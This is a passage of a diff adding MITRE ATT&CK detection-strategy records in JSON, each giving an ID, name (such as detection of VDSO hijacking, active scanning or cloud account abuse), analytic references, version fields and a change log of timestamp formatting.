+                        "x-mitre-analytic--0ea214f3-5d66-4170-b33d-58a6577bb074",
+                        "x-mitre-analytic--f9f7e5e7-edbf-442b-b4ea-d35455982ba8",
+                        "x-mitre-analytic--025e89c6-9383-48b5-b9f2-85ab31b6a7bb"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b511a320-18a6-46ff-9588-85065c44312f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.689000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0448",
+                            "external_id": "DET0448"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for VDSO Hijacking on Linux",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--bfc7e981-ca7e-4b1b-a692-65a8867a7a89"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.689000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--85849149-b36f-4562-9478-65c4e8f97dec",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0199",
+                            "external_id": "DET0199"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Virtual Machine Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--44bb0cf8-12ee-4a8f-8701-6c787a008bd8",
+                        "x-mitre-analytic--753ec5a6-9327-452e-ab9c-62b7206c24aa",
+                        "x-mitre-analytic--be2239de-ae8e-442d-a9f6-d34460b94e94",
+                        "x-mitre-analytic--86bb41b4-5c8a-4407-b788-8f6ea8457860"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--de98fda3-10f9-4013-a163-fb9b6c117a9b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0339",
+                            "external_id": "DET0339"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Weaken Encryption on Network Devices",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b192336c-4a85-4322-9ae8-fd6eb6b7747b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2fed2eb7-2b3e-494f-9154-b996090b5a1e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0494",
+                            "external_id": "DET0494"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Weaken Encryption: Disable Crypto Hardware on Network Devices",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1dd7c76f-ff71-4597-8785-f7a730101a00"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--bcddd949-40be-40dd-949e-8f69f893360b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0243",
+                            "external_id": "DET0243"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Weaken Encryption: Reduce Key Space on Network Devices",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b9e42cd6-da26-4e57-b628-aca0fb1bb3f3"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--70abbe3f-797d-495b-8f76-371408a0f929",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0058",
+                            "external_id": "DET0058"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Web Service: Dead Drop Resolver",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--55ec66de-8146-4fd0-a423-0954d6ba33ef",
+                        "x-mitre-analytic--dc4096a9-b89d-4bef-b20d-58cf5e87f6bf",
+                        "x-mitre-analytic--671050c7-7e86-4be7-9ab4-aa9c763fad44",
+                        "x-mitre-analytic--aae03a6c-b308-49cb-bb85-7be4a5c2a4bb"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f9c29db2-8790-4255-957f-9a02f1d8d024",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0536",
+                            "external_id": "DET0536"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Wi-Fi Networks",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8586fd06-9801-473e-8ea6-d3da0ec82267",
+                        "x-mitre-analytic--6ad3d8bb-fc6f-45fb-b44e-871c263230d8",
+                        "x-mitre-analytic--20c2cbdf-2a02-40d1-9d10-b91d9bbe3004",
+                        "x-mitre-analytic--8ea556b8-d6d3-430c-a438-847b00e607a5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1764bbd5-67d1-4225-9c06-0d5aa74d056f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0254",
+                            "external_id": "DET0254"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy of Transmitted Data Manipulation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4cf44d48-1a0f-45a4-9a25-8bee9677ab52",
+                        "x-mitre-analytic--500ae9f9-c6c2-4160-ac03-072d963eba63",
+                        "x-mitre-analytic--da6d7de2-a666-4fa3-aa53-54692a8167ae"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--fecfb9f9-645e-4e09-ba21-05bc60722688",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.391000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0311",
+                            "external_id": "DET0311"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection for Spoofing Tool UI across OS Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0f4ec296-008e-42aa-95b2-6e4e351d730c",
+                        "x-mitre-analytic--d1feb97f-3683-49f5-b5a8-b54d58de3444",
+                        "x-mitre-analytic--d9eb3056-115b-496a-89f7-be38470ff022"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.391000+00:00\", \"old_value\": \"2026-04-24T20:26:14.331Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a1a9e316-145a-4744-a594-7decc23c543d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0546",
+                            "external_id": "DET0546"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Abused or Compromised Cloud Accounts for Access and Persistence",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--02571f27-8fa6-47cb-9097-0b84016a1dda",
+                        "x-mitre-analytic--fc507123-4267-4cf8-9e30-a90a89043b20",
+                        "x-mitre-analytic--ac36f883-9a5b-4796-9f2e-18f1cce8fc0b",
+                        "x-mitre-analytic--5f1ffd26-01f7-47fc-b544-130fc14c0bd2"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4b5df4bb-4903-4c66-9900-30bc046447be",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0884",
+                            "external_id": "DET0884"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Acquire Access",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a62c45c3-3471-4366-9f7c-738fbd9473bd"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--56752265-8647-4ce2-bc6c-c38c2e14685c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0895",
+                            "external_id": "DET0895"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Acquire Infrastructure",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--96e1107e-7fbe-49a2-b425-9d85a6ff46df"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7bbdcd3b-241e-4ec8-ab43-6bd2c34ae77d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0830",
+                            "external_id": "DET0830"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Active Scanning",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c0195ab2-3c4e-41ce-a1e4-7e58118abeb4"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--309ca3cd-d3f0-4aea-8932-558550aa89f4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0034",
+                            "external_id": "DET0034"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Adversarial Process Discovery Behavior",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--625983e7-9736-44f4-98ba-f372b3a3d236",
+                        "x-mitre-analytic--59aedd87-8373-45d3-93e3-5697e4cc7a48",
+                        "x-mitre-analytic--80939714-6d17-4cc0-accd-3e1d634846bc",
+                        "x-mitre-analytic--7e029a7f-beb5-4da9-9d75-8fcfc812103b",
+                        "x-mitre-analytic--f6985c70-6de1-4600-aba0-5b3324184dce"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ea1f5423-64b9-44eb-824f-251aa0faccd2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0223",
+                            "external_id": "DET0223"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Adversary Abuse of Software Deployment Tools",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--39ec0aa6-935a-44d3-b206-211981dec3bd",
+                        "x-mitre-analytic--bbb8adb2-434a-483e-af3c-4843241e2158",
+                        "x-mitre-analytic--94e3c24f-01ee-45bc-89c0-7024ada7cc66",
+                        "x-mitre-analytic--2e6218d1-1f84-4dc5-8ab5-c24835aafbab",
+                        "x-mitre-analytic--82acd5d4-70e1-4f3e-b059-15bdc55cf4bf"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ec3e5f66-a2b8-48ae-9adf-eb4f5014ba70",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0247",
+                            "external_id": "DET0247"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Adversary Use of Unused or Unsupported Cloud Regions (IaaS)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5d4419cc-6925-4f7d-a247-e0a4634fea90"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--af66dc57-77fc-42a7-9e84-7a588c3ab516",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0414",
+                            "external_id": "DET0414"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
